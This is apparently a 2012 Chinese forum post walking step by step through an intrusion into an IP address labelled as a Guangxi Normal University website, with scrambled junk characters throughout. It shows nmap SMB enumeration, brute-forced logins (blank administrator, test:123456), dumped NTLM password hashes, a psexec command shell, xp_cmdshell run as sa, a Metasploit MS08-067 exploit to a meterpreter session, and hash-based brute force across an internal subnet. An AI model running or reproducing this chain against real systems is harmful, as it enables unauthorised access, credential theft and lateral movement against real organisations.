广西师范网站http://202.103.242.241/
5 F' L [6 g$ B: C: }9 O6 ~3 s" N k; _8 a; F9 e2 X- q
root@bt:~# nmap -sS -sV 202.103.242.241
+ Y2 B% b) j* \( H D b: O; r! K8 N4 v x
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST# e. z3 _4 R" B7 G4 C0 \* E0 C- e
3 @, K/ n1 Y' Y# Q9 x( DNmap scan report for bogon (202.103.242.241): F& ]( o) X- O; o. `
: j; _4 L. N+ o, w" V% I" G3 z( hHost is up (0.00048s latency).
% C% |* a+ | I. i7 [+ Y! Z- e
, ~. u! q( P: W) h) WNot shown: 993 closed ports2 M0 q3 r6 ]% ]; {
& s. I7 j# T( j- I3 ?
PORT STATE SERVICE VERSION; u+ Y& U0 v. q: r
- E' p7 q: D% _5 W' u/ X135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe): k7 m4 Q( ]: d* U
" n0 R3 _$ K2 Z6 p9 U0 i139/tcp open netbios-ssn
, u; O8 B* H; ?
6 } b9 U# k' O; W/ K* W' C445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
2 y6 X- c; M' X% j7 D }* G' `
7 p& Y/ b. S9 Y. Q6 S1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
2 l+ t; A9 C* a7 \' ?2 m& C- ^& @0 w2 b! H4 H& x/ c
1026/tcp open msrpc Microsoft Windows RPC
& b& ]; T# E; Q# j2 m% O, F3 e2 E8 J' r
3372/tcp open msdtc?
$ d, [& y" y4 ?: \1 p' p1 z1 \: x. _1 e; \' M! _2 I3 |( h0 [$ }
3389/tcp open ms-term-serv?) B2 l5 ~, @9 G7 i3 y
% k) B; S) c9 V6 f$ R8 _- P1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :% l" h0 r8 J- _/ b/ T- z- N, t
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
9 j' q, l* i7 g/ X* O: M( [% ^7 h. ^( g
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions3 }* W" |7 o6 s5 G1 X3 e
( U7 n( `$ A; W; i; OSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
+ @+ I: S b0 K2 A- q( p. Q
1 N% m6 z2 b9 |" T" \0 }SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
O8 F# P5 N$ E; C0 r# Z* ]1 f) f: g% o, G+ j, C
SF:ptions,6,”hO\n\x000Z”);
9 k0 N) X( w: }9 I3 x! A7 z, m
& `1 e! D9 P9 O6 ?$ b* H: j- w; TMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)0 B/ ^1 Y7 w$ p2 {: v3 w9 L( L
: k, c2 `7 K$ s$ A. M- F" R6 Z, mService Info: OS: Windows
) H: G% t3 _( ]
9 G) i P6 \$ G; w# c, pService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
3 ^ C0 H% c: A, ]: b7 M- L- t0 s, ?3 M' E' d
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds: ?( a$ w; I8 m7 i
9 f1 i* F3 S2 N" P4 V% \3 k+ xroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本& S+ D0 ~3 t8 r3 v; F+ D8 S
" X$ z7 [% M: g( b7 z) W
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse0 D+ s- n: j3 i- B& q
3 w, t0 H5 g7 J0 O9 p# l
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse9 J" ]! s2 e& M! V
! p) Q1 \% c/ |( t5 Z: t' d2 ~-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
- K h' O+ c2 p- T. O4 B
9 p7 n% m* P9 q9 W ~' x( G-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
% y \& h+ B: J
8 l4 K' w9 R* z" Y' G3 E$ s4 x-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
, R( W/ ^ g# S) E8 s" w- ~0 Y6 S f0 [# [0 t _0 w- }
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse3 ^' c7 Q4 q6 @2 \
7 R# s* W+ Q7 W0 v9 I$ @-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
6 a4 B3 N8 }2 x7 J- M1 B* h8 H" g9 |4 D5 _
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse% Z+ Y! K+ k! G* f; w: G4 l ~9 p
" e4 J: k* z3 P5 x
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
* N5 t$ ]- D9 ^$ a* w7 u
0 i) i4 J1 J% u/ X0 E: d$ }7 o-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse. N1 a; y7 t3 w. v- \4 d
% q7 U u( U) [$ O y-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
" b& H/ f- t- z0 f4 A; C1 I m2 J
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
8 C/ l7 w6 v/ s; v
6 Y" u c; u: p# Q, J: G-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
( ]/ m( f# z+ S7 }* g$ P5 g
/ a% L2 l- \2 c/ m1 c-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse0 z* o/ {" b B/ K2 @
3 P! \" D4 W; _* \( A-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse5 o& g6 P. I8 V' U% M: i5 w4 T
) K1 i; N G+ [$ l' v( Z; _2 sroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 # g% ?1 Q& W+ Z0 c
2 a: m1 J- u5 z9 n4 k7 ]* X6 B
//此乃使用脚本扫描远程机器所存在的账户名
' Q, C8 i4 g/ ]$ t1 h0 ]9 {' M' w& M! W
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST* N" L K! P- ^6 Z6 d1 x
~ D( d0 n3 S$ W& @1 j2 B
Nmap scan report for bogon (202.103.242.241)
+ b- r% q. \9 _4 N; f% V; t* u3 x0 w* A2 y% `3 l
Host is up (0.00038s latency).
, B" H L* l: {4 f! ?7 U# X; I' ]. n# A' h! m9 s
Not shown: 993 closed ports" `# Q, o: R9 C3 ~! k
; M5 V7 U( m+ U3 C
PORT STATE SERVICE
% o/ q! G. ?7 n3 ^
6 M# |% |; [% v3 y% U. ?. c7 |135/tcp open msrpc2 ^/ W! V9 P7 Z% E3 ^7 y4 b
% X; p2 B* K3 @/ g% B1 e) G
139/tcp open netbios-ssn
) j" B% A, p1 z* _# W$ ~' J8 l/ y% s3 {- w, }3 B& l z) Q
445/tcp open microsoft-ds
5 `; R0 n* c4 z5 p# O9 s, [9 B9 k; c- Y4 N2 }# g8 R
1025/tcp open NFS-or-IIS
; W' C5 `5 D; A3 q* G5 @( @9 T+ p
; B1 l9 a. m* h$ M; x7 \1 o1026/tcp open LSA-or-nterm
" ?6 U. ^2 }5 a7 S" P' B% m+ d! U# X8 P9 n5 M0 p3 {
3372/tcp open msdtc
) B, U+ n* v4 l$ _2 s2 B9 g
' I0 j/ s! b; B' |. a3389/tcp open ms-term-serv
/ ]8 q* n" U7 l9 Z' a; D5 ?- u
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
( U* [$ u" M2 ]! l" Y
/ g8 W, D. [4 j9 B2 {9 n% f: ^Host script results:
/ A j, w$ b% h$ v$ i( R$ V( [6 }) H3 ^2 B4 x$ m; x8 y1 l+ V
| smb-enum-users:; V) w$ Y* F6 g. s) }
9 I" y: g, n" L8 Y# b' S
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
& k* y! O9 b" m0 Y2 ?2 _, g# D" M# F! E/ k1 X4 Z% \1 q' G% q6 W
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds1 S( Y( H& m: [0 i( _9 F" a& }
6 l) s( i4 k$ m: V7 B" c& r" I3 \6 T
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
- z/ B, K. S, J6 @9 d0 A5 _: m" A: Q0 ^1 w0 G
//查看共享9 o e0 T8 E) S B' k0 z5 E0 Y' R
3 [8 l2 W% {) x9 O9 V: i: rStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
) t. p8 _! _5 k. L( u$ e& x( J* h
Nmap scan report for bogon (202.103.242.241)
# I* e* B, K* }3 J, O* ^$ ~2 K& i, C# q
Host is up (0.00035s latency).1 @4 g4 w: g) E* @" P1 L
& v* A' h/ e3 G0 g3 j6 H; X0 I9 ENot shown: 993 closed ports0 y/ Z( L" i% b- N5 O
9 X. {% ?3 e8 g
PORT STATE SERVICE# W: s) G+ q' q/ R, G
f( e4 w) o( E( t/ a* M2 j- |9 F* h
135/tcp open msrpc
% z9 T# ~6 X9 C% `& N; L# \; j) Y+ c/ G! z: d. e+ x7 }$ ?) t
139/tcp open netbios-ssn
3 w* g5 _2 R# u) k: t' X- Q+ R$ Q5 V. N, @! H
445/tcp open microsoft-ds( N! y1 @* p% Y' l$ {/ V8 |- `
- J( L# B4 x: r! _* d
1025/tcp open NFS-or-IIS
6 R% y& [6 @+ x/ e) }
4 ]1 Y5 n" ^: y& W1026/tcp open LSA-or-nterm
& c5 F$ X; `1 A% d- \: f0 T: _9 J/ b+ b6 a# {4 L0 D
3372/tcp open msdtc# G& G7 t4 q+ F0 X6 C- _' `$ }
/ f& d6 ?; x# e5 q; W& ~3389/tcp open ms-term-serv
& l$ f F$ W& ]( k" Z- N3 n; L5 I8 D2 u% Z
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
& ]2 ?* b4 n; M& u7 U2 a4 a; x9 u$ W) N3 {' t4 V! o7 ]& ~
Host script results:* a1 C$ d3 J8 M4 e% A
/ w& Z! s* |1 w, j. ?4 B| smb-enum-shares:
& N2 t$ H k3 s5 I* R y+ s9 j: Z8 m: W! S9 l* I
| ADMIN$( _8 L: |, W$ R! ^7 O2 u
" t5 J2 x Z" h
| Anonymous access: <none>
& }$ z: J' j& V2 R. i' S) k$ X/ y* u6 G
| C$. |+ a3 Y# `) v0 ~0 x' s
, x* `! V0 r5 W- t, d+ k# t
| Anonymous access: <none>
- V n6 p" @! d: \8 W7 a: u3 K" y! z
| IPC$" S9 }1 q& g+ G% |1 b" w
* q% T; ~4 G1 A, w
|_ Anonymous access: READ6 o4 h3 K4 m l4 x' U) i4 y( z( W1 W
" a1 ?6 c. h P- _4 HNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
: R$ E' c+ r3 F
9 K) @" j. K. r2 yroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
9 V) X1 a+ N! p- r! _! I! E; i1 Z2 l8 z6 k
//获取用户密码
8 c& O* r: [1 ?# O: T, A) F$ [5 E1 K0 }1 P3 N3 B' e
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST- ~5 s8 u8 Q1 n
6 B4 s* R7 n0 e8 [# r `7 V
Nmap scan report for bogon (202.103.242.2418)& I) S& s F5 k) I6 i+ M/ b, c
. }* c" p$ T3 ~5 K" rHost is up (0.00041s latency).
8 e( L3 A% [ x4 v' U1 r1 z0 n* \+ S; |( d7 R3 J( d; g) x1 c) y) o- r& g
Not shown: 993 closed ports2 f ~* C: [7 @ K; M
, n/ Q- j' Z" f6 DPORT STATE SERVICE8 W: v7 [" n( v& \3 N5 I
2 J) i* [+ P* l
135/tcp open msrpc
5 J8 s* t- n* k, a/ `' j1 s: ]% q' z! |
139/tcp open netbios-ssn
" p b. G5 C/ R8 Q4 O4 y, c! _
|7 q8 g* w1 n' ^445/tcp open microsoft-ds
2 \6 O9 c7 ^8 d# J5 P
8 D! S9 h; N$ c( F+ `. v1025/tcp open NFS-or-IIS
$ P/ B8 c% V1 c7 P: d5 z( U* [6 _% e6 \; X& G* A0 I
1026/tcp open LSA-or-nterm* ~. o. ~4 j! B- r# J8 Z. P9 a
. i$ U9 r* `$ G1 X: d! A# C
3372/tcp open msdtc# B0 j2 V+ ]' |% y/ a5 x2 o
7 t# b6 }, O9 O2 o7 R: t& f/ ]
3389/tcp open ms-term-serv
8 n. B" {3 J" S! h9 O$ x
# `$ b% o- v x1 r, tMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)( v* H0 g- R6 u5 q
7 Q1 j w% S% C! ]2 P6 B( v5 fHost script results:
5 c$ p! h% A" T/ r0 ?
/ d' |: ^9 Y [+ l| smb-brute:8 Y* p4 h. @1 K. h6 [1 p' I
1 R& U3 Q. ^; B/ Q3 `administrator:<blank> => Login was successful
3 [) P3 ` `9 g h! L7 }# K4 L; r L! r$ h* \6 S- v
|_ test:123456 => Login was successful
# Q4 U6 A, `% B" K4 |
5 k+ R# f& ^8 E5 kNmap done: 1 IP address (1 host up) scanned in 28.22 seconds. Q( i5 P+ X+ Y7 `2 l! ?
* ~* ^5 Z4 e& M# u4 B8 v# R$ yroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash: F4 l3 R1 A/ H
+ B8 E/ M6 G; Z9 R0 W+ X, a9 W
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
4 ~3 G& u5 g& c, _. K
9 E( N! \3 `2 |1 zroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
7 @. i. |8 ^% Q) E' C
% X2 ]7 d5 G# O1 {$ Yroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1395 t& W8 D9 Z% C6 d
* T+ V$ \& r3 f! z( v d5 o# tStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST) H' X) P/ x9 A9 P* a1 C
) w U! \9 q6 d% F3 ?+ t* kNmap scan report for bogon (202.103.242.241)- c$ L5 ?; E' L4 \# Y/ M
4 q) k5 X4 n( V" rHost is up (0.0012s latency).. w+ Z$ y9 j. H% h8 J
7 C; f, I- W; BPORT STATE SERVICE
8 j: {8 U% i3 c/ N$ y
3 ], S4 T; A) D135/tcp open msrpc0 _0 r2 s6 M; ~* X
8 Z4 b& F T, L4 D' ]' O$ ?" n139/tcp open netbios-ssn0 ^) ]: A2 o5 Y1 D4 i; n. }
) K2 x5 a1 k0 O1 m1 g& V0 Y& C445/tcp open microsoft-ds
8 v( I3 u/ v% o0 F4 C% Q8 r7 U8 T7 O: C
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)7 t. g9 b- e9 w- b$ z. x& R
/ c* j3 i! B7 F1 u$ M3 M
Host script results:
, |4 X( B5 b( s) Y- e3 w7 a6 F6 i5 K, b6 S) r" I* F- g9 s* A
| smb-pwdump:3 o7 ?7 S; U, ?2 k, b5 f( {. [ B
9 z! `; v+ Z, O# J _3 D" Z
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
; p2 U3 v+ S! `7 k! E$ n8 [; {
$ W' H3 c0 [; @8 D/ ]+ o| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
+ X" Z# @" d7 A* R3 S2 A6 P
# k( Q5 y2 H! g7 T; |& j| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D40 m. Z8 J! ?, L; ^% C
# O( q+ b+ _/ A/ T3 L6 E
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
: f, N2 `+ M Y- g7 R/ t, ]& ?& ~
! f2 j3 [- V7 G6 M q1 {# E9 |$ nNmap done: 1 IP address (1 host up) scanned in 1.85 seconds9 U/ o; l2 @7 G* }8 [8 ]
" G1 j2 e }8 }7 z1 A
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
5 j0 U) S- ~4 T& T! G- e
# J) C% ?; p% c: z* H" w-p 123456 -e cmd.exe: T1 {3 x% {/ Q `, X @
8 [7 T; I0 V* e8 ?* M/ ?
PsExec v1.55 – Execute processes remotely P$ i. M/ b) J* m
; \& H7 I2 s9 p; uCopyright (C) 2001-2004 Mark Russinovich+ t% K$ G* y; i/ C! L5 X% |
! d, S9 G! [! E% P1 Y6 ^Sysinternals – www.sysinternals.com+ o6 Q; J( a- b
, `2 ?; a5 z; _# j8 j% |% Z
Microsoft Windows 2000 [Version 5.00.2195]
2 Y* Y7 ~7 w1 f& J W" Z# i0 Z7 F6 z/ I2 \
(C) 版权所有 1985-2000 Microsoft Corp.& k* L6 m1 E( A
2 H" y) C9 |7 }C:\WINNT\system32>ipconfig/ K1 B( @. l3 E2 F+ I# j3 e+ C
! [9 d- a5 F9 r7 N, s1 lWindows 2000 IP Configuration
7 l4 w3 N# |- Q0 v. ~+ n
2 S9 K3 [4 e5 [2 o |# o' fEthernet adapter 本地连接:
/ x- v8 a# U3 {& ]8 w! L a2 z7 W) F/ P' F) f7 t$ z/ k* }
Connection-specific DNS Suffix . :- u2 d" ^$ ^. Z5 j# G& U8 c! Y4 h' Z
! C" M( ^% d$ O$ S
IP Address. . . . . . . . . . . . : 202.103.242.241
: a8 F, B. [$ o" `9 s8 W5 {* g' n; ?3 t _! D0 l+ P
Subnet Mask . . . . . . . . . . . : 255.255.255.07 { W$ E8 o! W1 C0 r
( Y; L! @2 f C7 p) @Default Gateway . . . . . . . . . : 202.103.1.1( K0 U2 M7 Q. n: W* o: u8 X
: s! c' H0 b, H* ^: R/ q
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令' P! Q1 D4 q" v' I: j3 p
+ L3 |9 V: j8 H- Rroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞( K, H8 n Z% C" P) C
6 G- ^8 B: E" JStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
! E1 H* S, G* Y3 H T' N* e
; |& A+ e# M6 k3 ^Nmap scan report for bogon (202.103.242.241)6 d: C+ y) K1 K" E
8 z! F1 R7 u+ @( D
Host is up (0.00046s latency).3 Z8 |5 l5 m2 [1 M0 l8 _
/ I& l3 h' | D# X: s6 j) V
Not shown: 993 closed ports8 R% U) O( ?1 q' @- f! E
" ?7 ]( U7 z7 o: R; A3 APORT STATE SERVICE1 V7 g" F6 E7 s5 D& T. o; u
2 b0 n1 N- I8 y2 h135/tcp open msrpc
' r0 {) i9 U `
: @ Y. d- \8 `; L) ?8 c139/tcp open netbios-ssn% U I. [* e% i: P' W
% X) e3 @3 i# p445/tcp open microsoft-ds" a; }; O& s; g5 f/ ~+ v8 t
+ q$ O! ?+ R2 c2 Y1 I
1025/tcp open NFS-or-IIS& o6 ^9 k2 J0 \4 R6 g' z
, f* w/ X7 ^; s! `* W9 w$ w' U
1026/tcp open LSA-or-nterm
4 b: v% H' h$ V' l0 x' i3 }' I" l8 i4 \& e! ^ v
3372/tcp open msdtc
( y" @, r/ k1 e' ]% r1 \! o. |
- R1 l3 W/ f+ e2 v* g( _5 T5 ]' E3389/tcp open ms-term-serv
" a2 A( M6 D) ?+ a- e* D; C/ \
$ L3 p8 }" o- v. d) V0 QMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
$ c, P+ z/ `5 n* _8 P; b& d; A
! H6 c, P+ P. w& K. b+ K: s( }' yHost script results:
" ~: f \) c2 a& f% J% |' _7 ~* D* l! Z0 s# y
| smb-check-vulns:/ G3 C P0 c' n/ e' v
; Q1 u3 c+ \# [ n' P4 u/ }. V|_ MS08-067: VULNERABLE
' N" M$ H0 g/ `, E8 ^: c
) v: s H; L$ n9 [! oNmap done: 1 IP address (1 host up) scanned in 1.43 seconds) D2 L" ?9 m# |0 {: g2 H
$ Y& f' d% D6 @5 o% A! c
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
; U! D% m o# U5 |$ }: y) l5 o L( g0 n. ^+ g3 F! @
msf > search ms08
& T$ p) k% B+ n0 g& O6 V* x9 u; D7 G* A7 P6 g
msf > use exploit/windows/smb/ms08_067_netapi h T/ R" v5 s+ t
8 n" M, O9 r: f5 K$ @4 A
msf exploit(ms08_067_netapi) > show options; j9 j7 x! z' D' Y* t
8 ]" K4 z8 j5 L/ W! n
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241' K( s0 A& y# U6 t% o6 U
5 D V2 t% t/ T( l( i0 i; p2 b
msf exploit(ms08_067_netapi) > show payloads
' x( Q# @, h# C6 J e+ o
+ |3 _: ?, u7 ~+ M ? J, {7 Omsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp# n% M8 X8 n9 J4 n; R) \* H2 ?% \ N
0 @6 F& B+ T, z6 ~7 A3 k. N0 S' n
msf exploit(ms08_067_netapi) > exploit
$ \ i. L* R' [) A+ p% r. @6 `! `2 Z- \
meterpreter >' v$ B' {. H. L8 N p. G$ l
4 b8 x) d" h, y# I$ t9 a6 D8 r8 k
Background session 2? [y/N] (ctrl+z)
1 c- [2 `1 u* ^9 F4 A" g
( ~( q) S3 P( f& nmsf exploit(ms08_067_netapi) > sessions -l
5 P( X8 j, @# v, Y# r' P1 q# x$ N+ s e) N; [' v6 W" c7 P1 K% }
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt" i& [! l9 R9 e+ N5 y
' k% r* C6 h* Y$ E9 N; e8 stest
0 R* Y- x, x% x7 J# h' p1 S O1 K9 [: V. ^5 ]0 I# Y# B" i6 Z
administrator+ `0 x5 E- A3 F1 F2 D# g
$ s; I4 A4 N7 K6 @
root@bt:/usr/local/share/nmap/scripts# vim password.txt0 ~: Q, y* D% n3 r
% M: |. x0 D! I! ?0 D/ q8 D2 p5 {
44EFCE164AB921CAAAD3B435B51404EE9 Q& q, `0 q1 h5 q U* v/ q
+ `- M3 R9 @( U0 \! V* b1 }) O
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 . J: z( l1 V% _$ ^: X: w
* s K' H! q7 g5 E- O! h //利用用户名跟获取的hash尝试对整段内网进行登录
' P; h* i1 U3 w# ~8 f: h% k
6 ?0 h/ E7 z+ G8 \% n% H2 D9 Q; b1 gNmap scan report for 192.168.1.105
3 \% y" c6 Q( m; S5 |5 k( C8 n# J) `' V+ w4 G. b
Host is up (0.00088s latency).' E" x: |' j5 r4 N2 {* S
/ M* y- e. c3 j4 a8 o
Not shown: 993 closed ports: T- D! |8 ]- C( A. H% q
# L! l+ B: N- OPORT STATE SERVICE5 C* w/ R8 ]# i# f' q( l
: @3 ^6 X5 u' y5 |9 z% A, S, l0 N" L
135/tcp open msrpc
8 X6 U) k }8 X# @
+ X5 C) W$ m. e: |139/tcp open netbios-ssn5 e4 K' s8 t# a8 G9 p$ f
+ ]+ k; c1 O' v; \, `445/tcp open microsoft-ds
/ [2 K1 T R/ d. o. W$ q# A# b" f
- d( [3 ^" Z+ N" J- }1025/tcp open NFS-or-IIS
. Y) R4 S' E% g- B# p f. G2 M2 U0 I1 L( ?& r2 {
1026/tcp open LSA-or-nterm
) l+ e& c8 R) P0 s: Z+ v8 s/ e+ G
3372/tcp open msdtc, V Q$ n1 l7 K U
; r% `( w3 c9 A2 r8 Q2 L
3389/tcp open ms-term-serv
6 u7 j8 t) ^/ C# q
; s W" r' G! i9 k/ `MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems); P6 i1 S0 L( f, o2 {) q2 e# K9 M
& _' ^7 m* _) u9 L3 Y. nHost script results:9 C1 o" r! H( Y2 I0 x# P/ y
7 q9 l. ?" d, ~# l: E/ |3 p6 ?
| smb-brute:
" u7 {2 j# r9 Q! }7 o2 s2 `6 l" {7 W$ E
|_ administrator:<blank> => Login was successful
9 S3 x# m) H' o" w- e3 w! H
5 \9 Z) ~: b6 a0 ^" {攻击成功,一个简单的msf+nmap攻击~~·7 K# X: R0 z [" r$ E
j( c: E5 m3 b6 K |
发表于 2012-12-4 12:46:42
收藏
支持
反对